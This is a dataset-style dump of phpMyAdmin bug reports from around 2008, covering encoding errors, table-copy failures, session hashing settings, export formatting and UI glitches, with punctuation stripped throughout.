phpMyAdmin SQL Dump version 2.11.5.1 http www.phpmyadmin.net Host localhost Generation Time Mar 31, 2008 at 10 09 PM Server version 5.0.45 PHP Version 5.2.5 SET SQL MODE= NO AUTO VALUE ON ZERO ; Database `web carl SysSIO` Table structure for table `BitacoraDetails` DROP TABLE IF EXISTS `BitacoraDetails`; CREATE TABLE IF NOT EXISTS `BitacoraDetails` `Borrado` char 1) collate latin1 spanish ci NOT NULL default N , `Consecutive` int 8) NOT NULL auto increment, `LogDate` date default NULL, `LogGuard` tinyint 2) unsigned NOT NULL default 0 , `DetailSortPriOrd` tinyint 2) unsigned NOT NULL default 1 , `DetailSpecial` tinyint 2) unsigned NOT NULL default 0 , `DetailStatus` tinyint 2) unsigned NOT NULL default 1 , `DetailPrintStatus` tinyint 2) unsigned NOT NULL default 0 , `DetailSendStatus` tinyint 2) unsigned NOT NULL default 0 , `DetailTimesOpened` tinyint 1) unsigned NOT NULL default 1 , `DetailSapNumber` varchar 20) collate latin1 spanish ci default NULL, `SubEstClave` varchar 6) collate latin1 spanish ci default NULL, `EleClave` varchar 12) collate latin1 spanish ci default NULL, `Unidad` varchar 10) collate latin1 spanish ci default NULL, `GpmKey` varchar 10) collate latin1 spanish ci default NULL, `ParoNumero` varchar 8) collate latin1 spanish ci default NULL, `ParoVigenciaFecha` date NOT NULL default 0000 00 00 , `ParoVigenciaHora` time NOT NULL default 00 00 00 , `ParoVigenciaWho` int 8) unsigned NOT NULL default 0 , `ParoVigenciaGuaFec` date NOT NULL default 0000 00 00 , `ParoVigenciaGuaHor` tinyint 2) unsigned NOT NULL default 0 , `ParoNotificaFecha` date NOT NULL default 0000 00 00 , `ParoNotificaHora` time NOT NULL default 00 00 00 , `ParoNotificaWho` int 8) unsigned NOT NULL default 0 , `ParoNotificaGuaFec` date NOT NULL default 0000 00 00 , `ParoNotificaGuaHor` tinyint 2) unsigned NOT NULL default 0 , `ParoEntradaFecha` date NOT NULL default 0000 00 00 , `ParoEntradaHora` time NOT NULL default 00 00 00 , `ParoEntradaWho` int 8) unsigned NOT NULL default 0 , `ParoEntradaGuaFec` date NOT NULL default 0000 00 00 , `ParoEntradaGuaHor` tinyint 2) unsigned NOT NULL default 0 , `ParoTerminadoFecha` date NOT NULL default 0000 00 00 , `ParoTerminadoHora` time NOT NULL default 00 00 00 , `ParoTerminadoWho` int 8) unsigned NOT NULL default 0 , `ParoTerminadoGuaFec` date NOT NULL default 0000 00 00 , `ParoTerminadoGuaHor` tinyint 2) unsigned NOT NULL default 0 , `ParoCerradoFecha` date NOT NULL default 0000 00 00 , `ParoCerradoHora` time NOT NULL default 00 00 00 , `ParoCerradoWho` int 8) unsigned NOT NULL default 0 , `ParoCerradoGuaFec` date NOT NULL default 0000 00 00 , `ParoCerradoGuaHor` tinyint 2) unsigned NOT NULL default 0 , `ParoSuspendidoFecha` date NOT NULL default 0000 00 00 , `ParoSuspendidoHora` time NOT NULL default 00 00 00 , `ParoSuspendidoWho` int 8) unsigned NOT NULL default 0 , `ParoSuspendidoGuaFec` date NOT NULL default 0000 00 00 , `ParoSuspendidoGuaHor` tinyint 2) unsigned NOT NULL default 0 , `ParoSuspendidoMotSus` text collate latin1 spanish ci NOT NULL, `DetailTimeStart` time default NULL, `DetailTimeEnd` time default NULL, `DetailCloseTime` time default NULL, `DetailWho` int 8) default NULL, `DetailSelect` text collate latin1 spanish ci NOT NULL, `DetailDet` text collate latin1 spanish ci, `DetailDet1` text collate latin1 spanish ci, `DetailDet2` text collate latin1 spanish ci, `DetailDet3` text collate latin1 spanish ci, `DetailDetFull` text collate latin1 spanish ci, `DetailTime` time default NULL, `DetailType` text collate latin1 spanish ci, `OverStartDate` date NOT NULL default 0000 00 00 , `OverStartTime` time NOT NULL default 00 00 00 , `OverEndDate` date NOT NULL default 0000 00 00 , `OverEndTime` time NOT NULL default 00 00 00 , `OverTotHora` int 3) unsigned NOT NULL default 0 , `OverTotMinu` tinyint 2) unsigned NOT NULL default 0 , `DetailUltAct` datetime NOT NULL default 0000 00 00 00 00 00 , PRIMARY KEY `Consecutive`), KEY `AccessKey` `LogDate`,`LogGuard`,`DetailSortPriOrd`,`DetailTime`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1 spanish ci COMMENT= Detalle de las Guardias en la SCADA AUTO INCREMENT=184494 ; Original URL https sourceforge.net p phpmyadmin bugs 2670 https sourceforge.net p phpmyadmin bugs 2670 Original author yacar suscri","bug"
"24444","9034","cannot force a language.
mysql version 5.0.45 php 5.2.3 phpmyadmin 2.11.5 if we configure config.inc.php with cfg[ Lang ] = fr iso 8859 15 ; expect result default langage will be latin1 actual result with display error = E ALL in php.ini) Notice Undefined index fr iso 8859 15 in .... index.php on line 95 Warning Cannot modify header information headers already sent by output started at .... index.php 95) in .... index.php on line 99 if it doesn t break anything i suggest this fix in libraries database interface.lib.php on line 833 replace If lang is defined and we are on MySQL gt;= 4.1.x, we auto switch the lang to its UTF 8 version if it exists and user didn t force language) if !empty GLOBALS[ lang ]) substr GLOBALS[ lang ], 5) != utf 8 ) !isset GLOBALS[ cfg ][ Lang ])) \{ lang utf 8 version = substr GLOBALS[ lang ], 0, strpos GLOBALS[ lang ], )) .
utf 8 ; if !empty GLOBALS[ available languages ][ lang utf 8 version])) \{ GLOBALS[ lang ] = lang utf 8 version; GLOBALS[ charset ] = utf 8 ; define PMA LANG RELOAD , 1); \} \} and we remove the non UTF 8 choices to avoid confusion if !defined PMA REMOVED NON UTF 8 )) \{ foreach GLOBALS[ available languages ] as each lang = gt; dummy) \{ if substr each lang, 5) != utf 8 ) \{ unset GLOBALS[ available languages ][ each lang]); \} \} define PMA REMOVED NON UTF 8 , 1); \} by If lang is defined and we are on MySQL gt;= 4.1.x, we auto switch the lang to its UTF 8 version if it exists and user didn t force language) if !empty GLOBALS[ lang ]) substr GLOBALS[ lang ], 5) != utf 8 ) !isset GLOBALS[ cfg ][ Lang ])) \{ lang utf 8 version = substr GLOBALS[ lang ], 0, strpos GLOBALS[ lang ], )) .
utf 8 ; if !empty GLOBALS[ available languages ][ lang utf 8 version])) \{ GLOBALS[ lang ] = lang utf 8 version; GLOBALS[ charset ] = utf 8 ; define PMA LANG RELOAD , 1); \} and we remove the non UTF 8 choices to avoid confusion if !defined PMA REMOVED NON UTF 8 )) \{ foreach GLOBALS[ available languages ] as each lang = gt; dummy) \{ if substr each lang, 5) != utf 8 ) \{ unset GLOBALS[ available languages ][ each lang]); \} \} define PMA REMOVED NON UTF 8 , 1); \} \} Original URL https sourceforge.net p phpmyadmin bugs 2671 https sourceforge.net p phpmyadmin bugs 2671 Original author thierryso Found in version 2.11.5","bug"
"24444","9035","Access denied for user root localhost .
With phpMyAdmin 2.11.5.1 I kept gettimng 1045 Access denied for user root localhost using password... .
I double checked my password, etc..
I ended up checking out 3.0.0 dev from SVN and when I pulled it up, it reported on the login interface that mcrypt was missing in my list of extensions.
I installed it, restarted the webserver and it worked instantly.
Sidenote PHP5 on Ubuntu doesn t have mcrypt by default.
I actually needed to add universe to my packages and get it from there.)
The note about mcrypt should probably be backported to the 2.x branch.
I know this probably happens only once in a lifetime ; )) or whenever you setup a new server, but it would be a huge convenience.
Category Usability Group 2.11.5.1 Original URL https sourceforge.net p phpmyadmin bugs 2672 https sourceforge.net p phpmyadmin bugs 2672 Original author klimpong","bug"
"24444","9036","Binary not treated as blob update delete issues.
CREATE TABLE IF NOT EXISTS `xf email verification` `email` varchar 255) NOT NULL, `pass` binary 20) NOT NULL, `ctime` int 11) NOT NULL, UNIQUE KEY `pass` `pass`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; Dumping data for table `xf email verification` INSERT INTO `xf email verification` `email`, `pass`, `ctime`) VALUES olaf xwis.net , xefxbfxbdx06xefxbfxbdJxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbd x16uxefxbfxbd xefxbfxbdaxefxbfxbdxefxbfxbdxefxbfxbdq , 1207577470), olaf xwis.net , xefxbfxbd.x18pmxefxbfxbdxefxbfxbdxefxbfxbdx06xefxbfxbdt?xefxbfxbdlxefxbfxbdxefxbfxbd xefxbfxbdxefxbfxbdxefxbfxbd , 1207577499); When I try to edit one of these rows, PMA shows these errors MySQL returned an empty result set i.e.
zero rows).
Warning mb strpos ) [function.mb strpos] Unknown encoding or conversion error.
in C \IS\Apache2.2\htdocs\phpMyAdmin\libraries\string mb.lib.php on line 60 Warning mb strpos ) [function.mb strpos] Unknown encoding or conversion error.
in C \IS\Apache2.2\htdocs\phpMyAdmin\libraries\string mb.lib.php on line 60 Warning mb strpos ) [function.mb strpos] Unknown encoding or conversion error.
in C \IS\Apache2.2\htdocs\phpMyAdmin\libraries\string mb.lib.php on line 60 SELECT FROM `xf3`.`xf email verification` WHERE CONVERT `xf email verification`.`pass` USING utf8) = xefxbfxbdx06xefxbfxbdJxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbd x16uxefxbfxbd xefxbfxbdaxefxbfxbdxefxbfxbdxefxbfxbdq ; It might be a good idea to treat binary fields as blobs.
;) Original URL https sourceforge.net p phpmyadmin bugs 2673 https sourceforge.net p phpmyadmin bugs 2673 Original author olafvdspek Found in version 2.11.5","bug"
"24444","9037","Auto Increment selected for TimeStamp by Default.
When having a TIMESTAMP Field Attributes set to ON UPDATE CURRENT TIMESTAMP when you go into that Field to edit options the Extra is defaulted to AUTO INCREMENT .
If one does not catch this and they select submit it will create an error.
With ON UPDATE CURRENT TIMESTAMP set to blank it does not default the Attributes to AUTO INCREMENT.
Original URL https sourceforge.net p phpmyadmin bugs 2674 https sourceforge.net p phpmyadmin bugs 2674 Original author spectral Found in version 2.11.5.1","bug"
"24444","9038","Incorrect string value.
I get this error after copying one table from one database to another.
The Database is copied perfectly but the error is displayed for database phpmyadmin table history.
The report will have three parts as presented in the screen after the query.
I m using, Windows XP SP2, Apache 2.2.8, Php 5.2.5, MySql Server version 5.0.45 community nt, client version 5.0.45 and PhpMyAdmin version 2.11.5.1 Table AnomDiaEneSub has been copied to AnomDiaEneSub.
SQL query DROP TABLE IF EXISTS `web carl Lecturas`.`AnomDiaEneSub`; CREATE TABLE `web carl Lecturas`.`AnomDiaEneSub` `AnoDiaEneSubAno` int 4 ) unsigned NOT NULL default 0 , `AnoDiaEneSubMes` int 2 ) unsigned NOT NULL default 0 , `AnoDiaEneSubDia` int 2 ) unsigned NOT NULL default 0 , `AnoDiaEneSubHor` int 2 ) unsigned NOT NULL default 0 , `AnoDiaEneSubMin` int 2 ) unsigned NOT NULL default 0 , `AnoDiaEneSubFecClav` varchar 12 ) character set latin1 NOT NULL default , `SubEstClave` varchar 6 ) character set latin1 NOT NULL default , `AnoDiaEneSubTotTra` bigint 15 ) unsigned NOT NULL default 0 , `AnoDiaEneSubTotCir` bigint 15 ) unsigned NOT NULL default 0 , `AnoDiaEneSubFacCal` decimal 21, 10 ) NOT NULL default 0.0000000000 , `AnoDiaEneSubFacEst` char 2 ) character set latin1 NOT NULL default , PRIMARY KEY `SubEstClave` , `AnoD[...] Run SQL query queries on database Lap VpTrans Lecturas DROP TABLE IF EXISTS `web carl Lecturas`.`AnomDiaEneSub`; CREATE TABLE `web carl Lecturas`.`AnomDiaEneSub` `AnoDiaEneSubAno` int 4 ) unsigned NOT NULL default 0 , `AnoDiaEneSubMes` int 2 ) unsigned NOT NULL default 0 , `AnoDiaEneSubDia` int 2 ) unsigned NOT NULL default 0 , `AnoDiaEneSubHor` int 2 ) unsigned NOT NULL default 0 , `AnoDiaEneSubMin` int 2 ) unsigned NOT NULL default 0 , `AnoDiaEneSubFecClav` varchar 12 ) character set latin1 NOT NULL default , `SubEstClave` varchar 6 ) character set latin1 NOT NULL default , `AnoDiaEneSubTotTra` bigint 15 ) unsigned NOT NULL default 0 , `AnoDiaEneSubTotCir` bigint 15 ) unsigned NOT NULL default 0 , `AnoDiaEneSubFacCal` decimal 21, 10 ) NOT NULL default 0.0000000000 , `AnoDiaEneSubFacEst` char 2 ) character set latin1 NOT NULL default , PRIMARY KEY `SubEstClave` , `AnoDiaEneSubFecClav` ) ) ENGINE = MyISAM DEFAULT CHARSET = latin1 COLLATE = latin1 spanish ci COMMENT = Anomalxefxbfxbdas de Consumo Diario de Subestaciones ; INSERT INTO `web carl Lecturas`.`AnomDiaEneSub` SELECT FROM `Lap VpTrans Lecturas`.`AnomDiaEneSub`; Error SQL query DocumentationEdit INSERT INTO `phpmyadmin`.`pma history` `username` , `db` , `table` , `timevalue` , `sqlquery` ) VALUES MainUser , Lap VpTrans Lecturas , AnomDiaEneSub , NOW ) , DROP TABLE IF EXISTS `web carl Lecturas`.`AnomDiaEneSub`; CREATE TABLE `web carl Lecturas`.`AnomDiaEneSub` `AnoDiaEneSubAno` int 4 ) unsigned NOT NULL default 0 , `AnoDiaEneSubMes` int 2 ) unsigned NOT NULL default 0 , `AnoDiaEneSubDia` int 2 ) unsigned NOT NULL default 0 , `AnoDiaEneSubHor` int 2 ) unsigned NOT NULL default 0 , `AnoDiaEneSubMin` int 2 ) unsigned NOT NULL default 0 , `AnoDiaEneSubFecClav` varchar 12 ) character set latin1 NOT NULL default , `SubEstClave` varchar 6 ) character set latin1 NOT NULL default , `AnoDiaEneSubTotTra` bigint 15 ) unsigned NOT NULL default 0 , `AnoDiaEneSubTotCir` bigint 15 ) unsigned NOT NULL default 0 , `AnoDiaEneSubFacCal` decimal 21, 10 ) NOT NULL default 0.0000000000 , `AnoDiaEneSubFacEst` char 2 ) character set latin1 NOT NULL default , PRIMARY KEY `SubEstClave` , `AnoDiaEneSubFecClav` ) ) ENGINE = MyISAM DEFAULT CHARSET = latin1 COLLATE = latin1 spanish ci COMMENT = Anomalxefxbfxbdas de Consumo Diario de Subestaciones ; INSERT INTO `w eb carl Lecturas `.
`A nomDiaEneSub ` SELECT FROM `L ap VpTrans Lecturas `.
`A nomDiaEneSub `; ) MySQL said Documentation 1366 Incorrect string value \xEDas de... for column sqlquery at row 1 Original URL https sourceforge.net p phpmyadmin bugs 2675 https sourceforge.net p phpmyadmin bugs 2675 Original author yacar suscri","bug"
"24444","9039","tbl oper.
>engine Undefined index BLACKHOLE.
http pma.cihar.com trunk config when changing table asdf from engine type innodb to blackhole I got Table maintenance Flush the table FLUSH ) Notice in .
tbl operations.php 438 Undefined index BLACKHOLE Backtrace Warning in .
libraries common.lib.php 2343 Invalid argument supplied for foreach ) Backtrace .
tbl operations.php 438 PMA generate html dropdown string new row format, NULL, string DYNAMIC, ) but the operaton succeeded.
No notices warnings in STABLE ) Original URL https sourceforge.net p phpmyadmin bugs 2676 https sourceforge.net p phpmyadmin bugs 2676 Original author windkiel Found in version Latest Git","bug"
"24444","9040","Export mishandles some characters when saving to file.
If I run a dump of my entire database, by default it is shown in an html textarea and works properly.
When I check Save as file some characters are mangled.
For example, the Portuguese word Associaxc3xa7xc3xa3o is only exported properly when not saving to a file.
Original URL https sourceforge.net p phpmyadmin bugs 2677 https sourceforge.net p phpmyadmin bugs 2677 Original author chengas123 Found in version 2.11.4","bug"
"24444","9041","missing < head> in signon.php.
typo in scripts signon.php lt;html gt; before lt;body must be lt; head gt; reported by Freeaqingme lt;n=Dolf ns3.hostdelight.com gt; xe2x80x9cDolf Schimmelxe2x80x9d on irc Original URL https sourceforge.net p phpmyadmin bugs 2678 https sourceforge.net p phpmyadmin bugs 2678 Original author windkiel","bug"
"24444","9042","cannot add new auto increment column to existing data.
when attempting to add an auto increment column to an existing table, the following SQL command is generated by phpMA ALTER TABLE `tbl` ADD `id` INT 10 ) NOT NULL AUTO INCREMENT FIRST the appropriate parameters were selected) This generates the following SQL Error Incorrect table definition; there can be only one auto column and it must be defined as a key This error is generated even if the primary key option box was checked.
This is because the primary key option box merely adds a second statement, which sets the new column as a primary key.
However, the second statement is not executed since the first statement fails.
The appropriate sql command to generate in this case should be ALTER TABLE `tbl` ADD `id` INT 10 ) NOT NULL PRIMARY KEY AUTO INCREMENT FIRST This is the only way to add a new id column to a table.
creating a non auto increment column and setting it to primary key fails because the new column will not have unique values.
creating a new column, making all the values in it unique manually, setting it to primary key and then adding auto increment would work, but is incredibly tedious.
Original URL https sourceforge.net p phpmyadmin bugs 2679 https sourceforge.net p phpmyadmin bugs 2679 Original author igor47 Found in version 2.11.5","bug"
"24444","9043","Font Size Ignored.
In 2.11.5.1 and 2.5.11.2 you changed if empty SESSION[ PMA Config ])) \{ We really need this one!
if !
function exists preg replace )) \{ PMA fatalError strCantLoad , pcre ); \} global PMA Config SESSION[ PMA Config ] SESSION[ PMA Config ] = new PMA Config .
config.inc.php ); \} elseif version compare phpversion ), 5 , lt )) \{ todo move all wakeup ) functionality into session.inc.php SESSION[ PMA Config ] gt; wakeup ); \} To We really need this one!
if !
function exists preg replace )) \{ PMA fatalError strCantLoad , pcre ); \} global PMA Config SESSION[ PMA Config ] force reading of config file, because we removed sensitive values in the previous iteration SESSION[ PMA Config ] = new PMA Config .
config.inc.php ); This is causing the font size set by the user on the opening page to be ignored.
While this may be minor it is important to those that need a select font size to see the page.
Original URL https sourceforge.net p phpmyadmin bugs 2680 https sourceforge.net p phpmyadmin bugs 2680 Original author nukescripts Found in version 2.11.5.1","bug"
"24444","9044","amp;amp;.
when run a sql query with html amp;amp;amp; lt;a href= index.php?ID=200 amp;amp;amp;page=A gt;index.php?ID=200 amp;amp;amp;page=A lt; a gt; if amp; disappear in the from I add a space lt;a href= index.php?ID=2006 amp;amp; amp;page=A gt;index.php?ID=200 amp;amp; amp;page=A lt; a gt; amp;amp;amp; gets amp;amp; amp; gets with a space Original URL https sourceforge.net p phpmyadmin bugs 2681 https sourceforge.net p phpmyadmin bugs 2681 Original author blhtml Found in version 2.9.2","bug"
"24444","9045","Undefined index crlf in export sql.php on line 141.
Fedora 8 Firefox 3 beta 5 phpMyAdmin.noarch 2.11.5.1 1.fc8 php.x86 64 5.2.4 3 mysql server.x86 64 5.0.45 6.fc8 I was copying a table using the interface.
After a successful copy, the information page that said Table AnswerChoices has been copied to QuestionChoices.
also said this 6 times at the top Notice Undefined index crlf in usr share phpMyAdmin libraries export sql.php on line 141 The SQL that was executed was ================================== CREATE TABLE `QuizGame`.`QuestionChoices` `Question` int 11 ) NOT NULL , `Choice` varchar 50 ) NOT NULL , KEY `Question` `Question` ) ) ENGINE = InnoDB DEFAULT CHARSET = utf8; INSERT INTO `QuizGame`.`QuestionChoices` SELECT FROM `QuizGame`.`AnswerChoices` ; ================================== Original URL https sourceforge.net p phpmyadmin bugs 2682 https sourceforge.net p phpmyadmin bugs 2682 Original author gregmartyn Found in version 2.11.5.1","bug"
"24444","9046","sorting links on table borwse column headers breaks on views.
When you are browsing a view, and you click on a column header to sort the display by that column, you get a query error.
The ORDER BY clause references the table that the field originates from, instead of the view.
So, if you are flipping through the records of a view called `View`, and click on the field name `last mod`, the ORDER BY will reference `OriginalTable` instead of `View`.
This is the relevant portion of the link.
sql query=SELECT 2AFROM vView ORDER BY 60Table 60.
60last mod 60 ASC Should be sql query=SELECT 2AFROM vView ORDER BY 60vView 60.
60last mod 60 ASC Tested in 2.11.4 and 2.11.6.
Original URL https sourceforge.net p phpmyadmin bugs 2683 https sourceforge.net p phpmyadmin bugs 2683 Original author lefevre10 Found in version 2.11.8","bug"
"24444","9047","overriding session.hash bits per character.
Hi, At Debian we ve gotten a bug report which I m quoting below.
Basically, the user has hashing of his sessions dir, but this is appearently broken by the following bit of code that phpMyAdmin employs in session.php use more secure session ids with PHP 5) if version compare PHP VERSION, 5.0.0 , ge ) substr PHP OS, 0, 3) != WIN ) \{ ini set session.hash function , 1); ini set session.hash bits per character , 6); \} As I understand it, only the first option actually changes the security, as it increases the number of bits in the algorithm.
Changing the hash bits per character option only changes the style of the session hash names, not their security.
Yet, hard overriding this second option causes trouble for sysadmins that have enabled hashing of their session dir as in the quoted bug report.
I see no real reason to hardcode the bits per character option, as the only thing it does is make te ID s a bit shorter, but they re not human readable anyway... Is there a reason why bits per character is hardcoded, or could it be removed?
thanks, Thijs === begin quote === Enabling hashing session files to directories[1] with default php configuration requires creating a directory hierarchy[2] for them.
Phpmyadmin enforces different session names[3] than configured by sysadmin, but does use default directory and hashing depth.
So if sysadmin creates hierarchy for his session naming scheme, phpmyadmin will fail creating some) of the session files because no directories [G Zg z] and maybe more?)
exist in the directory tree.
IMO phpmyadmin should honor session settings in the main php.ini or allow this behaviour to be configured by debconf along with its own session directory).
[1] accomplished by setting session.save path= 2; var lib php5 in etc php5 apache2 php.ini session name sess a1765f9b22bc2e2c2b672f4ab34a3199 is stored as var lib php5 a 1 sess a1765f9b22bc2e2c2b672f4ab34a3199 [2] with default php setting sessions are hashed to hex digit directories session.hash bits per character = 4) [3] usr share phpmyadmin libraries session.inc.php 66 [in 2.9.1.1 TK] === end quote === Original URL https sourceforge.net p phpmyadmin bugs 2685 https sourceforge.net p phpmyadmin bugs 2685 Original author lem9","bug"
"24444","9048","Search Limit Issue.
Basically the same issue as bug 1871164, but now for the Search results page.
Original URL https sourceforge.net p phpmyadmin bugs 2684 https sourceforge.net p phpmyadmin bugs 2684 Original author warforge00 Found in version 2.11.6","bug"
"24444","9049","Undefined variable in grab globals.lib.php.
Hello, I tried phpMyAdmin 2.11.6 with snapshot of PHP 5.3.0 dev Sat, 03 May 2008 04 27 45 0400).
Fortunately it works, but displays the following notice Undefined variable HTTP AUTHORIZATION in phpmyadmin\libraries\grab globals.lib.php on line 113 My auth type is config , PHP runs as Apache module, so to get rid of the notice I just removed HTTP AUTHORIZATION from array in the file grab globals.lib.php Line 104 server vars = array HTTP ACCEPT LANGUAGE ); Original URL https sourceforge.net p phpmyadmin bugs 2687 https sourceforge.net p phpmyadmin bugs 2687 Original author yrtimd Found in version 2.11.6","bug"
"24444","9050","alt text causes duplicated strings.
Hi!
This is a really minor issue.
A user reported to us that when browsing pma with images turned off in the browser, many strings in the interface are duplicated.
For example the top menu looks like this StructureStructure SQLSQL SearchSearch QueryQuery ExportExport BadgerBadger This is because they re prefixed with an icon that has the same ALT text.
I think in the cases where an icon just illustrates the text after it, it is hence better to set it to alt= .
It s easily reproduced in Firefox through turning off Preferences gt; Content gt; Load images automatically bye, Thijs Original URL https sourceforge.net p phpmyadmin bugs 2686 https sourceforge.net p phpmyadmin bugs 2686 Original author kink","bug"
"24444","9051","Database dropdown busted in 2.11.6.
I just upgraded from 2.10.0 to 2.11.6.
I uploaded the zip, unpacked, moved over my config.inc.php.
I went to phpmyadmin in browser and when loaded, the database select object dropdown) is busted.
It lists all the databases as links.
Once I click a database name, then it created the select object correctly on the next page.
Here are screengrabs http i285.photobucket.com albums ll64 jrlooney Picture1.jpg http i285.photobucket.com albums ll64 jrlooney Picture2.jpg Original URL https sourceforge.net p phpmyadmin bugs 2688 https sourceforge.net p phpmyadmin bugs 2688 Original author jrlooney Found in version 2.11.6","bug"
"24444","9052","Font Size Option Problem when no config file.
Hi there, I know that this Bug might be related to 1949378.
The way I produce it might vary from that one.
The font size is ignored different if no config.inc.php is available.
In case the config file isn t available The Dropdown seems to have kinda em relative values like 0.05, 1, 2, etc.
Changing the font size doesn t have any effect In case the config is available Dropdown shows a font size of 82 perfect for the paradice theme ) Changing the font size does have an effect I attached a Screenshot showing the differences.
Tests on WinXP SP2 using FF2.0.14, IE7, Safari 3 and Opera 7.23 To make sure it is not a problem of the paradice theme I checked the original and the darkblue orange theme and the bug occured too.
best regards Andy Original URL https sourceforge.net p phpmyadmin bugs 2689 https sourceforge.net p phpmyadmin bugs 2689 Original author andyscherzinger","bug"
"24444","9053","Yaml export, not really usable !.
Let say, we have the following DB structure Table human | id | name | | 1 | Joe | | 2 | Bill | Table animal | id | name | | 1 | Rex | | 2 | Pepet| And an other table to link pets to humans) An Yaml export will give this 1 id 1 name Joe 2 id 2 name Bill 1 id 1 name Rex 2; id 2 name Pepet This is just unusable !!!
There is a lot of way to have a better Yaml export Use same format as XML export myDBname human 1 id 1 name Joe 2 id 2 name Bill animal 1 id 1 name Rex 2; id 2 name Pepet Without DB name human 1 id 1 name Joe 2 id 2 name Bill animal 1 id 1 name Rex 2; id 2 name Pepet Flat, but with table name human 1 id 1 name Joe human 2 id 2 name Bill animal 1 id 1 name Rex animal 2; id 2 name Pepet Or, at least, using comments myDBname.human 1 id 1 name Joe 2 id 2 name Bill myDBname.animal 1 id 1 name Rex 2; id 2 name Pepet I personnaly prefer the first version...
Original URL https sourceforge.net p phpmyadmin bugs 2691 https sourceforge.net p phpmyadmin bugs 2691 Original author jugjug Found in version 2.11.5","bug"
"24444","9054","PMA getPlugins includes Non PHP files on OSX.
In function PMA getPlugins in file libraries plugin interface.lib.php if is file plugins dir .
file) eregi \.php , file)) Fails to take in account that OSX sometimes prepends filenames with a .
to make them hidden.
I dunno why this happens but I imagine it may have to do with a failed copy.
So, in my directory I had .somthing.php and somthing.php and the above function picked up the hidden file also.
I assume the solution would be to check for a .
in the first char of a string.
Original URL https sourceforge.net p phpmyadmin bugs 2690 https sourceforge.net p phpmyadmin bugs 2690 Original author spcmky Found in version 2.11.6","bug"
"24444","9055","DATE field content displayed as [BINARY 10B] .
Tested against svn revision 11277; MySQL client version 4.1.7; Used PHP extensions mysqli; MySQL server version 4.1.16 and 5.0.45; step by step create test table like this CREATE TABLE `Test` `d` date default NULL ) ENGINE=MyISAM DEFAULT CHARSET=utf8; insert a single entry in the table INSERT INTO `Test` `d`) VALUES 2008 05 15 ); Browse the table with phpMyAdmin; look at the content of the displayed table; = gt; expected result the date 2008 05 15 to be displayed; = gt; actual behavior [BINARY 10B] is displayed instead; Similar behavior is observed for TimeStamp columns.
Similar behavior is observed for BLOB columns, although cfg[ ShowBlob ] = true; Additional note for BLOB columns, when cfg[ ShowBlob ] = false, phpMyAdmin correctly displays [BLOB XXXB].
But when cfg[ ShowBlob ] = true, instead of the actual cell content, [BINARY XXXB) is displayed.
Please check for other column types not listed in the report which may cause the same behavior.
Original URL https sourceforge.net p phpmyadmin bugs 2692 https sourceforge.net p phpmyadmin bugs 2692 Original author gtalev Found in version Latest Git","bug"
"24444","9056","Cookies must be enabled past this point.
I started to get Cookies must be enabled past this point warning with phpMyAdmin 2.11.6.
I see it as soon as I enter PMA.
I can no longer change the parameters on the main page.
Interesting thing is that PMA s page browse buttons are not working either.
PMA was working properly without any errors.
Problem started recently.
I contacted to server admin, but he said that there was no change in the server.
I am sure that it is not a firewall problem.
Other users of the PMA got the same error on different computers.
I tried print R COOKIE); command to see the cookies.
There is no PMA cookie in the output.
PMA configuration file is as follows Servers configuration i = 0; Server localhost http) [1] i ; cfg[ Servers ][ i][ host ] = localhost ; cfg[ Servers ][ i][ extension ] = mysql ; cfg[ Servers ][ i][ connect type ] = tcp ; cfg[ Servers ][ i][ compress ] = false; cfg[ Servers ][ i][ controluser ] = secret); cfg[ Servers ][ i][ controlpass ] = secret); cfg[ Servers ][ i][ auth type ] = http ; cfg[ PmaAbsoluteUri ] = secret); Setting cfg[ PmaAbsoluteUri ] = ; does not work, either.
Server version is Apache 2.0.63 Unix) mod ssl 2.0.63 OpenSSL 0.9.8b mod auth passthrough 2.1 mod bwlimited 1.4 FrontPage 5.0.2.2635 PHP 5.2.5 on Linux There are other websites not PMA) on the server and they do not have a cookie problem.
I wrote the same problem to the PMA forum.
http sourceforge.net forum forum.php?thread id=2034525 forum id=72909 Original URL https sourceforge.net p phpmyadmin bugs 2693 https sourceforge.net p phpmyadmin bugs 2693 Original author sailorweb Found in version 2.11.6","bug"
"24444","9057","Error copy table, if created as ROW FORMAT=FIXED.
If table created as ROW FORMAT=FIXED, when copy table with data and structura to a new database copy error.
SQL syntax not correct in statment CREATE DATABASE.
In last line error COLLATION= cp1251ROW FORMAT=FIXED .
Error combine collation and row format.
Original URL https sourceforge.net p phpmyadmin bugs 2694 https sourceforge.net p phpmyadmin bugs 2694 Original author xpraptor","bug"
"24444","9058","copy db broken.
http pma.cihar.com trunk config ?db=1964643 Operations gt;Copy database to [pma3dbCopyTest] o) Structure and data [v] CREATE DATABASE before copying gt;Go ERROR target database `pma3dbCopyTest` not found CREATE DATABASE `pma3dbCopyTest` DEFAULT CHARACTER SET latin1 COLLATE latin1 swedish ci; Warning in .
libraries List.class.php 67 in array ) Wrong datatype for second argument Backtrace .
libraries List.class.php 67 in array string pma3dbCopyTest, object, ) .
libraries Table.class.php 597 PMA List gt;exists string pma3dbCopyTest) .
db operations.php 97 PMA Table moveCopy string 1964643, string 1964643tt, string pma3dbCopyTest, string 1964643tt, string data, boolean , string db copy, ) demo is using SVN revision 11280.
Original URL https sourceforge.net p phpmyadmin bugs 2695 https sourceforge.net p phpmyadmin bugs 2695 Original author windkiel Found in version Latest Git","bug"
"24444","9059","CSV for MS Excel escapes as .
export CSV for MS Excel escapes doubleqoutes inside a field surrounded by doubleqoutes) as instead of p.s.
the latest correctly working pma version was 2.11.3 Original URL https sourceforge.net p phpmyadmin bugs 2696 https sourceforge.net p phpmyadmin bugs 2696 Original author windkiel Found in version 2.11.6","bug"
"24444","9060","Result sets.
I have set in the php.ini mysql.trace mode = On and now in some pages i got a error at the lower side of the page.
Original URL https sourceforge.net p phpmyadmin bugs 2697 https sourceforge.net p phpmyadmin bugs 2697 Original author sworddragon Found in version 2.11.6","bug"
"24444","9061","SQL parser is slow.
phpMyAdmin is very slow at handling big SQL queries.
Using my debugger I can see that PMA SQP parse ) is the culprit.
A common example is a query like this SELECT FROM ids WHERE id IN 123,324,543,453,234, ...
Even if the query is just a few kilobytes, the parsing takes several seconds.
If the query is several hundred kilobytes, the parsing seems to take forever.
If the same query is sent to MySQL using the mysql command line utility, the query is executed without noticeable delay.
I don t know if it is possibly to optimize the parser enough to handle queries of almost arbitrary size.
